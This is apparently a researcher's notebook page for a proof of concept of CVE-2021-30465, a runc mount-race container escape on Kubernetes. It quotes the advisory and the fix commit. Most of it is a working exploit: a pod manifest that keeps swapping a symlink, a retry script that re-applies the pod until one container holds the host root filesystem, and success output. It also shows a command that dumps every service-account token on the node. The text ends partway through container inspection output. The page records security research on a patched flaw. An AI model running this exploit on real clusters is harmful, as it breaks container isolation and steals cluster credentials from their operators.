owned this note changed 4 years ago
Published Linked with GitHub

CVE-2021-30465 POC

GH link

tests


func TestStripRoot(t *testing.T) {
	for _, test := range []struct {
		root, path, out string
	}{
		// Works with multiple components.
		{"/a/b", "/a/b/c", "/c"},
		{"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"},
		// '/' must be a no-op.
		{"/", "/a/b/c", "/a/b/c"},
		// Must be the correct order.
		{"/a/b", "/a/c/b", "/a/c/b"},
		// Must be at start.
		{"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"},
		// Must be a lexical parent.
		{"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"},
		// Must only strip the root once.
		{"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"},
		// Deal with .. in a fairly sane way.
		{"/foo/bar", "/foo/bar/../baz", "/foo/baz"},
		{"/foo/bar", "../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar/../baz", "/foo/baz/bar", "/bar"},
		{"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"},
		// All paths are made absolute before stripping.
		{"foo/bar", "/foo/bar/baz/bee", "/baz/bee"},
		{"/foo/bar", "foo/bar/baz/beef", "/baz/beef"},
		{"foo/bar", "foo/bar/baz/beets", "/baz/beets"},
	} {
		got := stripRoot(test.root, test.path)
		if got != test.out {
			t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out)
		}
	}
}

Text from the CVE:

However, it turns out with some container orchestrators (such as Kubernetes --
though it is very likely that other downstream users of runc could have similar
behaviour be accessible to untrusted users), the existence of additional volume
management infrastructure allows this attack to be applied to gain access to
the host filesystem without requiring the attacker to have completely arbitrary
control over container configuration.

In the case of Kubernetes, this is exploitable by creating a symlink in a
volume to the top-level (well-known) directory where volumes are sourced from
(for instance,
`/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir`), and then
using that symlink as the target of a mount. The source of the mount is an
attacker controlled directory, and thus the source directory from which
subsequent mounts will occur is an attacker-controlled directory. Thus the
attacker can first place a symlink to `/` in their malicious source directory
with the name of a volume, and a subsequent mount in the container will
bind-mount `/` into the container.

Applying this attack requires the attacker to start containers with a slightly
peculiar volume configuration (though not explicitly malicious-looking such as
bind-mounting `/` into the container explicitly), and be able to run malicious
code in a container that shares volumes with said volume configuration. It
helps the attacker if the host paths used for volume management are well known,
though this is not a hard requirement.

Text from commit

rootfs: add mount destination validation
Because the target of a mount is inside a container (which may be a
volume that is shared with another container), there exists a race
condition where the target of the mount may change to a path containing
a symlink after we have sanitised the path -- resulting in us
inadvertently mounting the path outside of the container.

This is not immediately useful because we are in a mount namespace with
MS_SLAVE mount propagation applied to "/", so we cannot mount on top of
host paths in the host namespace. However, if any subsequent mountpoints
in the configuration use a subdirectory of that host path as a source,
those subsequent mounts will use an attacker-controlled source path
(resolved within the host rootfs) -- allowing the bind-mounting of "/"
into the container.

While arguably configuration issues like this are not entirely within
runc's threat model, within the context of Kubernetes (and possibly
other container managers that provide semi-arbitrary container creation
privileges to untrusted users) this is a legitimate issue. Since we
cannot block mounting from the host into the container, we need to block
the first stage of this attack (mounting onto a path outside the
container).

The long-term plan to solve this would be to migrate to libpathrs, but
as a stop-gap we implement libpathrs-like path verification through
readlink(/proc/self/fd/$n) and then do mount operations through the
procfd once it's been verified to be inside the container. The target
could move after we've checked it, but if it is inside the container
then we can assume that it is safe for the same reason that libpathrs
operations would be safe.

A slight wrinkle is the "copyup" functionality we provide for tmpfs,
which is the only case where we want to do a mount on the host
filesystem. To facilitate this, I split out the copy-up functionality
entirely so that the logic isn't interspersed with the regular tmpfs
logic. In addition, all dependencies on m.Destination being overwritten
have been removed since that pattern was just begging to be a source of
more mount-target bugs (we do still have to modify m.Destination for
tmpfs-copyup but we only do it temporarily).

Fixes: CVE-2021-30465
Reported-by: Etienne Champetier <champetier.etienne@gmail.com>
Co-authored-by: Noah Meyerhans <nmeyerha@amazon.com>
Reviewed-by: Samuel Karp <skarp@amazon.com>
Reviewed-by: Kir Kolyshkin <kolyshkin@gmail.com> (@kolyshkin)
Reviewed-by: Akihiro Suda <akihiro.suda.cz@hco.ntt.co.jp>
Signed-off-by: Aleksa Sarai <cyphar@cyphar.com>

Dev Setup is a kind cluster

$▶ kind version
kind v0.11.0 go1.16.3 darwin/amd64
$▶ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc94
commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf
spec: 1.0.2-dev
go: go1.16.4
libseccomp: 2.5.1
root@kind-control-plane:/#

Second dev setup

$ kind version
kind v0.8.1 go1.14.2 darwin/amd64
$ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc10
spec: 1.0.1-dev

Theory 1.

This requires two different deployments that each target the same "mount point"

First deployment mounts and creates a symlink of at a well defined place in the nodes fs.

Second deployment mounts and follows the symlink to exploit town.

Theory 2

This is a single pod spec with multiple volumes much like subpath exploit but with different symlink targets: one that satisfies the "inside the container" check but has something else going for it that lets the second mount follow it back.

Hacks

learn underlying host path for volume that is shared.

grep empty /proc/1/task/1/mountinfo

1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/escape-volume/host /rootfs rw,relatime - ext4 /dev/vda1 rw
1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/status-volume /status rw,relatime - ext4 /dev/vda1 rw

symlink_race

pushed a symlink example container here: mauilion/symlinks:push

From Etienne

My exploit uses:
1) multiple containers
2) empty dir volumes / tmpfs (but some other types are likely usable)
3) mount into mounts, ie
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test1/mnt2

If you can forbid mount into mounts you prevent this attack

Don't hesitate to ping me in public issue if needed

more hacks.

initial attempt

---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  containers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "cd /mnt1 && ln -s / mnt2 "]
    volumeMounts:
    - mountPath: /mnt1
      name: test1
  - image: nginx:stable
    name: exploit
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /test1/mnt2
      name: test2
    - mountPath: /test1
      name: test1

  volumes:
  - name: test1
    emptyDir: {}
  - name: test2
    emptyDir: {}
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  initContainers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape/status/)"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
  containers:
  - image: nginx:stable
    name: exploitj
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs/status
      name: escape-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}

trick to grab logs for failed pod on the host
this grabs the recently exited prehonk container and grabs the logs from it.

root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}')
+ cd /mnt1
+ ln -s / mnt2
ln: failed to create symbolic link 'mnt2/': File exists

Working exploit code:

# honk-pod.yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  #securityContext:
    #runAsUser: 1000
    #runAsGroup: 1000
  containers:
  - image: nginx:latest
    imagePullPolicy: IfNotPresent
    name: 0-link0
    command: ["/bin/bash"]
    args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 1-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 2-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 3-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: host-volume
    emptyDir: {}
$ honk.sh 
#!/usr/bin/env bash

RUNS=1
while [ $RUNS -lt 100 ]; do

  kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null
  sleep 3
  kubectl apply -f honk-pod.yaml
  kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null
  COUNTER=1
  while [ $COUNTER -lt 4 ]; do
    echo -n "Checking $COUNTER-honk for the host mount..."
    # count the pid directories on the host if there are more than 5 
    # we have a success. 
    if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then

    # GKE
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Kind
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Civo/k3s
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
      echo "SUCCESS after $RUNS runs!"
      echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash"
      exit 0
    else
      echo "nope."
    fi
    let COUNTER=$COUNTER+1
  done
 
 let RUNS=$RUNS+1
done
$ ./honk.sh
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
...snip...
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...SUCCESS after 22 runs!
Run kubectl exec -it honk -c 3-honk -- bash

By seeing /run/runc in in the exploit container, we know we have a hostpath mount working because that path only exists on the underlying node and not inside our nginx container. This may vary per target, but it's easy enough to adjust if needed.

$ kubectl exec -it exploit -c 3-honk -- bash
root@honk:/# ls
bin  boot  dev  etc  home  kind  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@honk:/# 
$ kubectl exec -it exploit -c 3-honk -- crictl ps
CONTAINER           IMAGE               CREATED             STATE               NAME                      ATTEMPT             POD ID
f354220ae48d3       f0b8a9a541369       8 minutes ago       Running             3-honk                    2                   d6cfcd0c10c43
847a2f406e30f       f0b8a9a541369       8 minutes ago       Running             2-honk                    0                   d6cfcd0c10c43
7d6994acef655       f0b8a9a541369       8 minutes ago       Running             1-honk                    0                   d6cfcd0c10c43
36ac6b9ef00d0       f0b8a9a541369       8 minutes ago       Running             0-link                    0                   d6cfcd0c10c43
c672feb53eaa9       e422121c9c5f9       18 hours ago        Running             local-path-provisioner    0                   aedc00f117150
8a3fea897c809       bfe3a36ebd252       18 hours ago        Running             coredns                   0                   cbda6967dd1f7
afe11ac87a75e       bfe3a36ebd252       18 hours ago        Running             coredns                   0                   6f26d4dcd0e2e
79d5da0a84ef1       6b17089e24fdb       18 hours ago        Running             kindnet-cni               0                   8539b3556a14b
e9b44cb76c812       23b52beab6e55       18 hours ago        Running             kube-proxy                0                   815a6a9064842
c80612e8c9e52       0369cf4303ffd       18 hours ago        Running             etcd                      0                   0563e084fe6ee
09ef10a38b9e8       51dc9758caa7b       18 hours ago        Running             kube-controller-manager   0                   c566b807c748b
d0f8fb646cd32       3ad0575b6f104       18 hours ago        Running             kube-apiserver            0                   327abdbfe5320
396e975f0500a       cd40419687469       18 hours ago        Running             kube-scheduler            0                   950216aec91d8
root@honk:/# amicontained
Container Runtime: docker
Has Namespaces:
	pid: true
	user: false
AppArmor Profile: unconfined
Capabilities:
	BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (20):
	MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE BPF
Looking for Docker.sock
# find -L /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g';

/var/lib/kubelet/pods/05415399-22a8-4203-935f-fb7ff6662d01/volumes/kubernetes.io~secret/kindnet-token-49xqw/token
eyJhbGciO...
/var/lib/kubelet/pods/339bd96c-a6c9-434e-8cbf-41450eeeebd8/volumes/kubernetes.io~secret/kube-proxy-token-krck6/token
eyJhbGciO...
/var/lib/kubelet/pods/64ca5b3b-c68b-4ca9-b85e-c0304ba691c8/volumes/kubernetes.io~secret/coredns-token-vh96r/token
eyJhbGciO...
/var/lib/kubelet/pods/74a4d033-f7f3-4f86-88e6-88bd9266de17/volumes/kubernetes.io~secret/local-path-provisioner-service-account-token-5gvlp/token
eyJhbGciO...
/var/lib/kubelet/pods/7691bf45-3159-4f40-b054-f52144871e5b/volumes/kubernetes.io~secret/coredns-token-vh96r/token
eyJhbGciO...
/var/lib/kubelet/pods/b50b2a73-9265-4090-9b27-1d5d2cf00942/volumes/kubernetes.io~secret/default-token-bxhkj/token
eyJhbGciO...

Inspect an exploited container from the host

# crictl inspect e1e8927a546a6
{
  "status": {
    "id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
    "metadata": {
      "attempt": 0,
      "name": "2-exploit"
    },
    "state": "CONTAINER_RUNNING",
    "createdAt": "2021-05-21T00:52:20.8831732Z",
    "startedAt": "2021-05-21T00:52:21.0110818Z",
    "finishedAt": "1970-01-01T00:00:00Z",
    "exitCode": 0,
    "image": {
      "annotations": {},
      "image": "docker.io/library/nginx:latest"
    },
    "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2",
    "reason": "",
    "message": "",
    "labels": {
      "io.kubernetes.container.name": "2-exploit",
      "io.kubernetes.pod.name": "exploit",
      "io.kubernetes.pod.namespace": "default",
      "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
    },
    "annotations": {
      "io.kubernetes.container.hash": "b5a5fa",
      "io.kubernetes.container.restartCount": "0",
      "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
      "io.kubernetes.container.terminationMessagePolicy": "File",
      "io.kubernetes.pod.terminationGracePeriod": "30"
    },
    "mounts": [
      {
        "containerPath": "/rootfs",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/rootfs/host",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": true,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/etc/hosts",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/dev/termination-log",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      }
    ],
    "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log"
  },
  "info": {
    "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
    "pid": 2894296,
    "removing": false,
    "snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
    "snapshotter": "overlayfs",
    "runtimeType": "io.containerd.runc.v2",
    "runtimeOptions": null,
    "config": {
      "metadata": {
        "name": "2-exploit"
      },
      "image": {
        "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
      },
      "command": [
        "sleep",
        "infinity"
      ],
      "envs": [
        {
          "key": "KUBERNETES_PORT_443_TCP_ADDR",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_HOST",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT",
          "value": "443"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT_HTTPS",
          "value": "443"
        },
        {
          "key": "KUBERNETES_PORT",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PROTO",
          "value": "tcp"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PORT",
          "value": "443"
        }
      ],
      "mounts": [
        {
          "container_path": "/rootfs",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume"
        },
        {
          "container_path": "/rootfs/host",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume"
        },
        {
          "container_path": "/var/run/secrets/kubernetes.io/serviceaccount",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "readonly": true
        },
        {
          "container_path": "/etc/hosts",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
        },
        {
          "container_path": "/dev/termination-log",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a"
        }
      ],
      "labels": {
        "io.kubernetes.container.name": "2-exploit",
        "io.kubernetes.pod.name": "exploit",
        "io.kubernetes.pod.namespace": "default",
        "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
      },
      "annotations": {
        "io.kubernetes.container.hash": "b5a5fa",
        "io.kubernetes.container.restartCount": "0",
        "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
        "io.kubernetes.container.terminationMessagePolicy": "File",
        "io.kubernetes.pod.terminationGracePeriod": "30"
      },
      "log_path": "2-exploit/0.log",
      "linux": {
        "resources": {
          "cpu_period": 100000,
          "cpu_shares": 2,
          "oom_score_adj": 1000,
          "hugepage_limits": [
            {
              "page_size": "1GB"
            },
            {
              "page_size": "2MB"
            }
          ]
        },
        "security_context": {
          "namespace_options": {
            "pid": 1
          },
          "run_as_user": {},
          "masked_paths": [
            "/proc/acpi",
            "/proc/kcore",
            "/proc/keys",
            "/proc/latency_stats",
            "/proc/timer_list",
            "/proc/timer_stats",
            "/proc/sched_debug",
            "/proc/scsi",
            "/sys/firmware"
          ],
          "readonly_paths": [
            "/proc/asound",
            "/proc/bus",
            "/proc/fs",
            "/proc/irq",
            "/proc/sys",
            "/proc/sysrq-trigger"
          ]
        }
      }
    },
    "runtimeSpec": {
      "ociVersion": "1.0.2-dev",
      "process": {
        "user": {
          "uid": 0,
          "gid": 0
        },
        "args": [
          "sleep",
          "infinity"
        ],
        "env": [
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=exploit",
          "NGINX_VERSION=1.19.10",
          "NJS_VERSION=0.5.3",
          "PKG_RELEASE=1~buster",
          "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1",
          "KUBERNETES_SERVICE_HOST=10.96.0.1",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443"
        ],
        "cwd": "/",
        "capabilities": {
          "bounding": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "effective": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "inheritable": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "permitted": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ]
        },
        "oomScoreAdj": 1000
      },
      "root": {
        "path": "rootfs"
      },
      "mounts": [
        {
          "destination": "/proc",
          "type": "proc",
          "source": "proc",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/dev",
          "type": "tmpfs",
          "source": "tmpfs",
          "options": [
            "nosuid",
            "strictatime",
            "mode=755",
            "size=65536k"
          ]
        },
        {
          "destination": "/dev/pts",
          "type": "devpts",
          "source": "devpts",
          "options": [
            "nosuid",
            "noexec",
            "newinstance",
            "ptmxmode=0666",
            "mode=0620",
            "gid=5"
          ]
        },
        {
          "destination": "/dev/mqueue",
          "type": "mqueue",
          "source": "mqueue",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/sys",
          "type": "sysfs",
          "source": "sysfs",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "ro"
          ]
        },
        {
          "destination": "/sys/fs/cgroup",
          "type": "cgroup",
          "source": "cgroup",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "relatime",
            "ro"
          ]
        },
        {
          "destination": "/rootfs",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/rootfs/host",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hosts",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/termination-log",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hostname",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/resolv.conf",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/shm",
          "type": "bind",
          "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/var/run/secrets/kubernetes.io/serviceaccount",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "options": [
            "rbind",
            "rprivate",
            "ro"
          ]
        }
      ],
      "annotations": {
        "io.kubernetes.cri.container-name": "2-exploit",
        "io.kubernetes.cri.container-type": "container",
        "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
      },
      "linux": {
        "resources": {
          "devices": [
            {
              "allow": false,
              "access": "rwm"
            }
          ],
          "memory": {},
          "cpu": {
            "shares": 2,
            "period": 100000
          }
        },
        "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
        "namespaces": [
          {
            "type": "pid"
          },
          {
            "type": "ipc",
            "path": "/proc/2893298/ns/ipc"
          },
          {
            "type": "uts",
            "path": "/proc/2893298/ns/uts"
          },
          {
            "type": "mount"
          },
          {
            "type": "network",
            "path": "/proc/2893298/ns/net"
          }
        ],
        "maskedPaths": [
          "/proc/acpi",
          "/proc/kcore",
          "/proc/keys",
          "/proc/latency_stats",
          "/proc/timer_list",
          "/proc/timer_stats",
          "/proc/sched_debug",
          "/proc/scsi",
          "/sys/firmware"
        ],
        "readonlyPaths": [
          "/proc/asound",
          "/proc/bus",
          "/proc/fs",
          "/proc/irq",
          "/proc/sys",
          "/proc/sysrq-trigger"
        ]
      }
    }
  }
}

Inspect a non-exploited container

# crictl inspect addfd289b2769 
{
  "status": {
    "id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
    "metadata": {
      "attempt": 0,
      "name": "1-exploit"
    },
    "state": "CONTAINER_RUNNING",
    "createdAt": "2021-05-21T00:52:20.4450061Z",
    "startedAt": "2021-05-21T00:52:20.6401701Z",
    "finishedAt": "1970-01-01T00:00:00Z",
    "exitCode": 0,
    "image": {
      "annotations": {},
      "image": "docker.io/library/nginx:latest"
    },
    "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2",
    "reason": "",
    "message": "",
    "labels": {
      "io.kubernetes.container.name": "1-exploit",
      "io.kubernetes.pod.name": "exploit",
      "io.kubernetes.pod.namespace": "default",
      "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
    },
    "annotations": {
      "io.kubernetes.container.hash": "7a407414",
      "io.kubernetes.container.restartCount": "0",
      "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
      "io.kubernetes.container.terminationMessagePolicy": "File",
      "io.kubernetes.pod.terminationGracePeriod": "30"
    },
    "mounts": [
      {
        "containerPath": "/rootfs",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/rootfs/host",
